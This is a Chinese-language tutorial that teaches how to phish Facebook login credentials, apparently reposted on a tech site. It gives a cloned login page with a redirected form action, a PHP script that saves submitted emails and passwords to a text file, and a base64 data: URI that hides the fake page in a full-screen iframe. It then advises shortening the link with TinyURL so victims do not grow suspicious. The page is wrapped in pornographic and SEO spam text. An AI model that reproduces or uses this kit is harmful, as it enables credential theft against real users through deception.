成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何利用iframe URI釣魚

安全 應用安全
本文以盜取facebook登陸帳號的釣魚為例,來示例如何釣魚攻擊的基本步驟。過程很簡單,主要包括兩個步驟,制作釣魚頁面,與釣魚URI,其他網站的釣魚頁面也可以采取相似的方法,剛接觸釣魚的可以看看。

本文以盜取facebook登陸帳號的釣魚為例,來示例如何釣魚攻擊的基本步驟。過程很簡單,主要包括兩個步驟,制作釣魚頁面,與釣魚URI,其他網站的釣魚頁面也可以采取相似的方法,剛接觸釣魚的可以看看。

一、制作釣魚頁面

以盜取facebook登陸帳號的釣魚為例,一共包含三個文件,index.html,login.php,password.txt

第一步:制作index.html登陸頁面

首先,打開 https://www.facebook.com頁面,查看源碼,將源碼copy到index.html文件中。

然后,編輯index.html文件,找到

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" 
method="post" onsubmit="return window.Event &amp;&amp; 
Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

將action的值改為

action=login.php?"https://www.facebook.com/login.php?login_attempt=1"

 

(login.php是用來盜取登陸帳號密碼的)

將index.html放到web目錄下(我的放置在/Library/WebServer/Documents/facebook目錄下)

 

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

第二步:制作盜取facebook帳戶和密碼的腳本login.php

 

<?php
header ('Location: https://www.facebook.com ');//跳轉到真實的facebook頁面
$handle = fopen("password.txt", "a");//將假頁面中提交的POST數據寫入password.txt文件中foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");}
fwrite($handle, "===============\r\n");
fclose($handle);exit;?>

 第三步:創建接收POST數據的password.txt文件

dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebook
dani-2:facebook leedani$ sudo touch password.txt  
dani-2:facebook leedani$ sudo chmod a+w password.txt  

第四步:測試

登陸http://localhost/facebook/

輸入電子郵件與密碼,點擊登陸

查看password.txt文件

dani-2:facebook leedani$ cat password.txt  

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

看,email與pass字段就是facebook的登陸帳號與密碼。

二、制作釣魚URI

一般釣魚會采用iframe用釣魚頁面遮蓋原始頁面的方式來進行釣魚,接下來的操作就是生成一個有這個功能的Data: URI,并將這個URI進行短地址轉換

第一步:生成攻擊代碼

src就是你存放釣魚網頁的地址

<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" 
frameBorder="0" scrolling="auto">iFrame Failed</iframe

第二步:將攻擊代碼轉換為data: URI

登陸http://dopiaza.org/tools/datauri/index.php,將上面代碼粘貼進去,

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

對應的data: URI

data:text/plain;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

將上面的data: URI中的data:text/plain改成data:text/html

data:text/html;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

訪問修改后的Data URI,我們可以看到

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

點擊facebook圖標,或下面的url鏈接(瀏覽facebook.com),將跳轉到我們在第一步中創建的facebook的假登陸頁面 http://localhost/facebook/。

第三步:生成data: URI對應的短地址

很顯然,這個URI太長了,會引起懷疑,在真實環境下,我們可以先進行短網址轉換,例如http://tinyurl.com/就提供這個服務

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

最后,引誘受害者點擊這個會連接到釣魚網頁的URI就可以盜取帳號密碼了。

參考:http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/

責任編輯:藍雨淚 來源: 碳基體
相關推薦

2009-01-04 09:57:24

2024-05-24 14:39:33

2015-06-15 11:45:55

2024-01-05 08:58:36

2023-12-14 15:34:19

2010-10-25 11:52:05

RSA身份認證總監在線欺詐

2017-01-20 15:34:10

2009-10-28 10:31:39

在線交易SSL證書

2014-09-11 15:04:13

2023-08-03 17:57:43

2024-03-11 16:03:59

2011-07-05 14:22:19

2013-03-11 18:04:02

2021-08-29 21:58:58

釣魚攻擊微軟SharePoint

2020-02-04 09:02:02

新型冠狀病毒網絡釣魚攻擊

2024-08-20 15:38:02

2022-01-06 07:56:31

DMARC網絡釣魚攻擊

2025-01-10 11:55:58

2020-10-08 09:55:32

釣魚郵件黑客網絡釣魚

2020-08-07 10:41:20

網絡釣魚網絡攻擊漏洞
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产成人av电影 | 欧美在线 | 日韩一区二区久久 | 精品日韩一区 | 久久高清精品 | 久久久久精 | 欧美成人精品 | 成人免费观看男女羞羞视频 | 日日艹夜夜艹 | 欧美黄在线观看 | 亚洲综合无码一区二区 | 久久久久久国产 | 精彩视频一区二区三区 | 狠狠操电影 | 亚洲国产aⅴ成人精品无吗 亚洲精品久久久一区二区三区 | 成人午夜精品 | 精品久久久久久亚洲精品 | 国产一区二区精品在线观看 | 久久久久久亚洲精品 | 青青草在线播放 | 国产成人精品综合 | 成人久久久| 国产在线精品一区二区三区 | 国产精品久久久久久久久久免费看 | 一级毛片观看 | 国产精品日韩欧美一区二区三区 | 久久久久久久久国产成人免费 | 一区二区在线免费观看 | 毛片入口 | 国产精品99久久久久久久久 | 国产99视频精品免费播放照片 | 国产婷婷精品 | 亚洲综合国产精品 | 日韩精品一区二区三区视频播放 | 免费看片国产 | 美女国产一区 | 黄在线 | 丁香婷婷综合激情五月色 | 亚洲一区视频在线 | 欧美日韩亚洲国产 | 欧美aaaaaaaaaa|